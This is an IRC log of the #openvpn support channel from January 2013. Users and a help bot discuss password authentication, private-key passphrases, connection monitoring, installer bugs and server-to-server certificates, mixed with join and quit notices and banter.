<@krzee> !authpass 19:24 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name 19:24 <@krzee> thats another way ^ 19:24 <+pekster> Or keep the password and just log out before handing the laptop to someone else? 19:25 <@krzee> although yes, pekster's idea is perfect 19:25 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 244 seconds] 19:25 <@krzee> in fact even if you use pam, for your use you should encrypt the private key as well 19:25 <+pekster> No need to have a private key client-side if using PAM server-side without two-factor auth 19:25 <+pekster> The only key would be on the server (and I suppose the CA key) 19:26 <@krzee> sure, but you could just use pki, forget about pam altogether and encrypt the private key 19:26 <@krzee> thats what ild do 19:26 -!- corretico [~luis@190.211.93.38] has joined #openvpn 19:27 <@krzee> !certpw 19:27 <@krzee> !factoids search cert 19:27 <@vpnHelper> 'servercert', 'certs', 'nocert', 'certverify', 'certinfo', 'cert_chains', and 'certfight' 19:27 <@krzee> hmm 19:27 <@krzee> someone was changing vpnHelper on me =/ 19:27 < ThersiT> Yeah, that sounds like a way better way to do it. Glad I asked. Thanks. 19:27 <@krzee> !factoids search pw 19:27 <@vpnHelper> "pwfile" is (#1) OpenVPN will only read passwords from a file if it has been built with the --enable-password-save configure option, or on Windows by defining ENABLE_PASSWORD_SAVE in config-win32.h or (#2) see --auth-user-pass in the manual (!man) for more info or (#3) if you're using this with the windows service, you will need --askpass 19:27 <@krzee> !factoids search pass 19:27 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password' 19:27 <@krzee> !change-passphrase 19:27 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase 19:27 <@krzee> there ya go ^ 19:28 <@krzee> and i was wrong, nobody changed anything… im just not thinking well after a full day digging and moving hay at the ranch 19:28 <+pekster> I think the solution is a glass or 3 of beer 19:29 <@krzee> i was gunna go with my pipe 19:29 <@krzee> !learn certpw as [change-passphrase] 19:29 <@vpnHelper> Joo got it. 19:29 <@krzee> !certpw 19:29 <@vpnHelper> "certpw" is "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase 19:29 <@krzee> there we goes 19:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:35 < ThersiT> Cool, I'm gonna have to do some reading to wrap my head around all of that but it looks like just what I need. 19:41 <@krzee> o if yu use windows you dont need to mess with commandline 19:42 <@krzee> you could right click the openvpn tray icon and say "change password" 19:42 <@krzee> the password it refers to is for the private key 19:42 <@krzee> then anyone with access to the computer cant use the private key without that password 19:44 < ThersiT> haha. My machines are all linux but the work laptop is windows. I think I'd like to try it at the commandline first. 19:44 <@krzee> werd 19:44 <+pekster> The GUI password change feature is just a proxy to 'openssl rsa' anyway 19:44 < ThersiT> That sounds too much like cheating to me. 19:45 <+pekster> It even has cute registry keys to "prevent" you from changing to a too-short or empty password :P 19:45 <@krzee> no empty? then how do you remove the pass via gui? 19:46 <+pekster> Set the registry to allow it? 19:46 <@krzee> then again maybe you dont want people who cant use openssl from cli to be removing passwords 19:46 <+pekster> Yea, that ^^ 19:47 <@krzee> sometimes i forget to stop thining like a unix guy 19:47 <@krzee> thinking* 19:47 <+pekster> I forget even when I'm on Windows (any box I'm on usually gets Cygwin/putty/gVim/notepad++ installed in about 2 minutes of my arrival) 19:47 -!- ThersiT1 [~AndChat50@99-88-241-15.lightspeed.austtx.sbcglobal.net] has joined #openvpn 19:48 <@krzee> oh i got that box joined to the domain over the vpn :D 19:48 -!- raidz is now known as raidz_away 19:48 <@krzee> \o/ 19:48 <@krzee> (speaking of windows) 19:49 <@krzee> you were right (as you know), split-dns was perfect 19:49 <+pekster> Try this on for size; I once had to reset a domain users' pass 2 jobs ago who "forgot" and couldn't log in locally using the cached domain credientials (no domain access, remember.) I got her logged in using a local account, set up OpenVPN as a system service to start on boot, rebooted, and she was able to use the newly reset password 19:50 <+pekster> That was not a very fun 30 minutes... 19:50 * pekster files that under "ways you're not generally supposed to do things" 19:50 <@krzee> hahah 19:52 <@krzee> luckily a co-worker knew the local account credentials 19:53 <@krzee> i had visions of trying to help (in spanish ) a guy hack windows local account 19:54 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 252 seconds] 19:59 -!- ThersiT1 [~AndChat50@99-88-241-15.lightspeed.austtx.sbcglobal.net] has quit [Quit: Bye] 20:45 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 20:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 21:05 -!- u0m3_ [~Radu@92.80.113.12] has joined #openvpn 21:07 -!- u0m3 [~Radu@92.80.72.203] has quit [Ping timeout: 245 seconds] 21:16 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 21:28 -!- ThersiT [~ThersiT@unaffiliated/thersit] has quit [Quit: Ex-Chat] 21:52 < soapee01> krzee! 21:53 < soapee01> dang bouncer. 22:04 < soapee01> :/ this supybot needs the later plugin. 22:55 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 22:55 -!- BtbN [~btbn@btbn.de] has joined #openvpn 23:19 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:19 -!- mode/#openvpn [+o krzee] by ChanServ 23:26 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 23:33 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 23:43 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn --- Day changed Fri Jan 25 2013 00:12 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 255 seconds] 00:15 -!- rkantos [~Name@4e.fi] has joined #openvpn 00:30 -!- brute11k [~brute11k@89.249.230.106] has quit [Ping timeout: 276 seconds] 00:35 -!- rkantos [~Name@4e.fi] has quit [Ping timeout: 245 seconds] 00:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 240 seconds] 00:42 -!- rkantos [robin@4e.fi] has joined #openvpn 00:51 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 255 seconds] 00:56 -!- lonmarlon [~lonmarlon@msmi.manship.com] has joined #openvpn 00:56 < lonmarlon> hello guys 00:57 < lonmarlon> i'd like to ask a question 00:57 <@krzee> !ask 00:57 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 00:57 < lonmarlon> cool 00:58 < lonmarlon> well anyways it's about how to monitor the login and disconneted time of the users in openvpn 00:58 < lonmarlon> i'm using a lenny server 00:58 <@krzee> via script 00:58 <@krzee> how you go about that is up to you, but heres a few ideas: 00:58 -!- rkantos [robin@4e.fi] has joined #openvpn 00:58 < lonmarlon> do you have sample script that i can learn? 00:59 < lonmarlon> yes i know via script 00:59 <@krzee> a) you could have a client-connect / client-disconnect script that updates some sort of database 00:59 <@krzee> b) you could have a script via crontab that checks the management interface 01:00 <@krzee> c) you could have a cron script read the status file after sending a signal to openvpn to update it 01:00 < lonmarlon> what do you mean by management interface? 01:00 <@krzee> !management 01:00 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 01:00 < lonmarlon> hehehe your really cool 01:00 <@krzee> and im sure theres other ways to do it as well 01:01 <@krzee> thats just 3 lil ideas for ya, a push in the right direction 01:01 <@krzee> !factoids 01:01 < lonmarlon> do you know where can i get a sample script so i can study them? 01:01 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 01:02 <@krzee> nope 01:02 <@krzee> i just checked the bot to see if he had one 01:04 < lonmarlon> are you a sysad krzee? 01:05 <@krzee> sure 01:05 < lonmarlon> where you from? 01:07 <@krzee> !krzee 01:07 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg 01:18 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 01:30 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn 01:31 < CrashTM> hello people 01:35 < lonmarlon> nice 01:41 -!- lonmarlon [~lonmarlon@msmi.manship.com] has quit [] 01:42 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 01:42 -!- ade_b [~Ade@95.209.41.35.bredband.tre.se] has joined #openvpn 01:42 -!- ade_b [~Ade@95.209.41.35.bredband.tre.se] has quit [Changing host] 01:42 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 01:44 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 276 seconds] 01:49 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 246 seconds] 01:51 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 01:57 -!- rkantos [robin@4e.fi] has joined #openvpn 01:57 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Ping timeout: 264 seconds] 01:59 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 02:10 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:10 -!- chovy [~ettinger@108-194-42-92.lightspeed.mtryca.sbcglobal.net] has joined #openvpn 02:11 < chovy> is it possible to use openvpn on a server? 02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 02:20 <+hazardous> yes 02:26 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds] 02:26 -!- rkantos [robin@4e.fi] has joined #openvpn 02:26 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 244 seconds] 02:55 -!- rkantos [robin@4e.fi] has quit [Read error: Operation timed out] 02:58 -!- xe` [~xe@annex.yi.org] has joined #openvpn 03:06 -!- rkantos [robin@4e.fi] has joined #openvpn 03:10 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:35 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:51 -!- gardar [~gardar@gardar.net] has joined #openvpn 04:01 < EugeneKay> krzee is from the moon 04:02 < EugeneKay> Where they smoke the moonajuana 04:04 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 04:04 < djc> after installing openvpn-2.3 on 64-bit win7, I get an error that amounts to "Error while creating HKLM\Software\OpenVPN-GUI key" 04:04 < djc> anyone knows what's up with that 04:09 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out] 04:09 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 04:24 < djc> also, you guys should create a "2.3" version in the bug tracker 04:24 < djc> also also, any knows what's up with client-to-client on iOS clients? 04:28 -!- dazo_afk is now known as dazo 04:34 < kisom> djc: There's an iOS client now? 04:37 < djc> kisom: there is 04:37 < djc> apparently openvpn worked with apple to use their proprietary vpn apio 04:38 < djc> there are some caveats, and client-to-client (which wasn't in the caveats) didn't work for me, but otherwise it's quite smooth (largely similar to the Android stuff) 04:38 < kisom> Nice, gotta check it out 04:38 < kisom> client-to-client is a server directive, fyi 04:39 < djc> I'm aware 04:39 < djc> but from the iOS client, I can't reach other clients 04:39 < kisom> I don't see why it would not work on iOS if there is a client 04:39 < djc> which works with Android clients 04:39 < kisom> OK, I'll have a look later 04:39 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in] 04:40 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 04:41 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:41 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Remote host closed the connection] 04:42 <@dazo> djc: regarding 252 -> that is a known bug in the 2.3.0-I0001 installer. Mattock has a fix. 04:42 <@dazo> "custom path" is broken 04:45 -!- mjixx_ [~markus@80.67.14.31] has quit [Ping timeout: 252 seconds] 04:45 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:45 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 04:47 < djc> oh, was that in #openvpn-devel 04:47 < djc> ? 04:47 < djc> thanks for relaying it, in any case :) 04:48 < djc> dazo: I was a bit confused by the separate openvpn-gui project, so I filed everything against openvpn, hope that's okay 04:48 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 248 seconds] 04:49 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Ping timeout: 248 seconds] 04:50 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 04:51 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 04:51 <@dazo> djc: yeah, we'll figure it out :) 04:52 < djc> dazo: btw, the 3.0 roadmap looks kind of cool, though the rewrite from scratch sounds a bit scary 04:52 -!- master_of_master [~master_of@p57B53A40.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 04:53 <@dazo> djc: it's not a complete rewrite, though ... actually we're moving the current code base slowly towards that goal ... however, James have written something from scratch already - for Andriod and iOS, but that haven't been open sourced yet (they have promised that will happen, though) 04:53 <@dazo> but that re-write is currently only the client side code 04:54 < djc> a use case I've thought about in the past would be a small liberally-licensed network protocol library that would let me connect with a static vpn config, so I could embed a small copy in an android or ios app so that I could basically run a webview app over vpn 04:54 < djc> of course, my use case is significantly reduced now that there are nice ios and android implementations :) 04:54 -!- master_of_master [~master_of@p57B540A0.dip.t-dialin.net] has joined #openvpn 04:56 < djc> also, I do hope netlink sockets support is at some not-too-low level of priority :) 04:57 < djc> dazo: anyway, is there any rough eta for a 2.3.1 that includes mattock's fix for the installer? 04:58 <@dazo> djc: that's something like that I believe the Andriod and iOS implementation looks like .... library oriented 04:59 <@dazo> djc: mattock releases new installers independently of OpenVPN now ... so he'll fix that as soon as he got a time slot ... that's the good thing about the split-up we did in 2.3 05:00 <@dazo> djc: in regards to netlink sockets support ... well, we have a lot of things on the TODO list ... but all of us are loaded with real work as well, so we tend to scratch our own itches these days 05:01 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 246 seconds] 05:01 <@dazo> djc: having that said ... many of us will go to FOSDEM this year again, and rumour goes that even James Yonan will come too 05:02 < djc> man, I regret not going to FOSDEM more every day :) 05:02 <@dazo> djc: you should regret that! ;-) 05:02 < djc> yeah, well, I'm going skiing next week :P 05:02 <@dazo> (it's never too late to turn) 05:02 <@dazo> heh 05:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 05:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 06:07 -!- master_of_master [~master_of@p57B540A0.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:43 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 248 seconds] 06:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 07:05 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Ping timeout: 255 seconds] 07:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:08 -!- dazo is now known as dazo_afk 07:11 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 07:54 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn 07:55 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 07:58 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Read error: Connection reset by peer] 08:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 08:04 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit [] 08:06 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 08:08 -!- batrick [~batrick@nmap/developer/batrick] has quit [Ping timeout: 272 seconds] 08:22 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 08:22 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 08:22 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 08:34 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 08:34 -!- MariusIT [~userit@86.120.191.55] has left #openvpn [] 08:56 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 08:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:16 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn 09:17 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 09:27 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 256 seconds] 09:28 -!- ch1mkey [ch1m@ns203993.ovh.net] has left #openvpn [] 09:29 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:40 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 256 seconds] 09:40 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 09:40 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 09:40 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:40 -!- mode/#openvpn [+o krzee] by ChanServ 09:41 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 09:41 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 09:41 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 09:42 <@krzee> !learn krzee location: moon base where he smokes moonajuana 09:42 <@vpnHelper> (learn [] as ) -- Associates with . is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value. 09:42 <@krzee> !learn krzee as location: moon base where he smokes moonajuana 09:42 <@vpnHelper> Joo got it. 09:42 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 09:43 < rob0> krzee, I'll be thinking of you at 4:20 09:43 <@krzee> i feel honored 09:43 <@krzee> Eagleman, if they were signed by the same CA, 2 server certs will work 09:43 < rob0> Eagleman, did you try it? Did it work? 09:44 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:44 <@krzee> in fact each can check the other was signed as a server too 09:44 <@krzee> and that ^ 09:44 < Eagleman> client-server did work, havent been able to test server-server 09:45 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 09:46 -!- xe` [~xe@annex.yi.org] has left #openvpn ["Leaving"] 09:47 < Eagleman> ok it seems to work 09:48 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 246 seconds] 09:48 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:52 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 245 seconds] 09:57 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 09:58 -!- dazo_afk is now known as dazo 10:00 < Eagleman> Aaand i was wrong: error=unsupported certificate purpose 10:01 < Eagleman> connecting to an openvpn server with a server certificate 10:02 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 252 seconds] 10:03 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 10:04 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 10:05 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 10:05 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 10:05 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 10:09 <@krzee> !route 10:09 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 10:09 <@krzee> !whybridge 10:09 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 10:11 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit [] 10:11 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 10:15 -!- u0m3_ [~Radu@92.80.113.12] has quit [Read error: Connection reset by peer] 10:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 10:18 -!- u0m3 [~Radu@109.96.140.34] has joined #openvpn 10:20 <@krzee> !book 10:20 <@vpnHelper> "book" is http://www.packtpub.com/openvpn-2-cookbook/book check out JJK's awesome cookbook for openvpn 2! 10:28 <@krzee> !confgen 10:28 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 10:33 -!- brute11k [~brute11k@89.249.231.95] has joined #openvpn 10:37 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:41 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 10:43 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 256 seconds] 10:49 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 248 seconds] 10:50 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds] 10:50 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 252 seconds] 10:53 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 10:57 -!- tMobile4a03 is now known as tyteen4a03 11:04 -!- bisko [~bisko@77.70.26.115] has quit [Quit: Computer has gone to sleep.] 11:04 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 11:04 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 11:04 -!- raidz_away is now known as raidz 11:04 -!- raidz [~raidz@raidz.im] has quit [Changing host] 11:04 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:05 -!- mode/#openvpn [+o raidz] by ChanServ 11:05 -!- mattock_afk is now known as mattock 11:05 -!- mattock [~mattock@raidz.im] has quit [Changing host] 11:05 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 11:05 -!- mode/#openvpn [+o mattock] by ChanServ 11:05 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:06 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 255 seconds] 11:07 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:07 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Client Quit] 11:08 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:08 -!- mode/#openvpn [+o raidz] by ChanServ 11:27 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 11:31 <@krzee> !tcpip 11:31 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 11:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 11:33 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 11:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 11:47 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 276 seconds] 11:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:00 -!- chovy [~ettinger@108-194-42-92.lightspeed.mtryca.sbcglobal.net] has left #openvpn [] 12:14 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 276 seconds] 12:14 -!- black_ [black@got.laid.using.blackmajic.org] has joined #openvpn 12:28 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 12:30 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 12:30 -!- zz_AsadH is now known as AsadH 12:30 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 12:30 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 12:54 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 248 seconds] 13:10 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 13:15 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 13:15 -!- zz_AsadH is now known as AsadH 13:15 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 13:15 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 13:18 -!- mdw- [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 13:36 -!- gardar_ [~gardar@gardar.net] has joined #openvpn 13:42 -!- Netsplit *.net <-> *.split quits: gardar 13:48 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 14:00 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Read error: Connection reset by peer] 14:01 -!- raidz_ [~raidz@raidz.im] has joined #openvpn 14:01 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 255 seconds] 14:01 -!- raidz_ is now known as raidz 14:01 -!- raidz [~raidz@raidz.im] has quit [Changing host] 14:01 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 14:01 -!- mode/#openvpn [+o raidz] by ChanServ 14:06 -!- vpopov [~happylife@149.62.17.217] has quit [Read error: Operation timed out] 14:16 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 14:16 -!- mode/#openvpn [+o mattock] by ChanServ 14:20 -!- mute [mute@clt.scottn.us] has joined #openvpn 14:20 -!- SpookZA [~SpookZA@197.87.53.234] has joined #openvpn 14:25 -!- mute [mute@clt.scottn.us] has left #openvpn [] 14:26 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has joined #openvpn 14:26 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has quit [Changing host] 14:26 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 14:32 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 14:34 <@ecrist> bitch 14:34 <@ecrist> boats and hos even 14:35 -!- Irssi: #openvpn: Total of 170 nicks [6 ops, 0 halfops, 3 voices, 161 normal] 14:36 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has joined #openvpn 14:54 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 244 seconds] 14:59 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has joined #openvpn 14:59 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has quit [Changing host] 14:59 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 15:10 -!- brute11k [~brute11k@89.249.231.95] has quit [Quit: Leaving.] 15:14 -!- brute11k [~brute11k@89.249.231.95] has joined #openvpn 15:17 -!- brute11k [~brute11k@89.249.231.95] has quit [Client Quit] 15:20 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 252 seconds] 15:27 -!- rkantos [robin@4e.fi] has joined #openvpn 15:30 -!- rkantos_ [robin@4e.fi] has joined #openvpn 15:30 -!- rkantos_ [robin@4e.fi] has quit [Client Quit] 15:33 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 246 seconds] 15:33 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 276 seconds] 15:34 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 15:46 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 15:50 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- \o/] 15:50 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 15:52 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds] 15:56 -!- dazo is now known as dazo_afk 15:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 15:57 -!- rkantos [robin@4e.fi] has joined #openvpn 16:00 -!- bisko [~bisko@178.254.232.159] has quit [Ping timeout: 255 seconds] 16:02 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit 